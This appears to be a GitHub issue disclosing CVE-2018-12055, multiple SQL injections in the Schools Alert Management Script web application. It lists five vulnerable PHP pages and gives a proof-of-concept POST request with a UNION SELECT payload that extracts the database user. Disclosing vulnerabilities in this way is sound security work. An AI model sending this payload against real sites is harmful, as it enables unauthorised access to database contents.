Skip to content

[CVE-2018-12055] Schools Alert Management Script Multiple SQL Injections #2

Open
@unh3x

Description

@unh3x

=================
Schools Alert Management Script - SQL Injections

Date: 07.06.2018
Vendor Homepage: https://www.phpscriptsmall.com/
Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
Category: Web Application
Exploit Author: xiaotian.wang From DBAppSecurity
Tested on: Linux Mint
CVE: CVE-2018-12055

=================
Vulnerable cgi:

  1. contact_us.php
  2. faq.php
  3. about.php
  4. photo_gallery.php
  5. privacy.php

=================
Proof of Concept:

POST http://localhost/[PATH]/photo_gallery.php
DATA  xxx'/**/union/**/all/**/select/**/1,user(),3,4#

image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions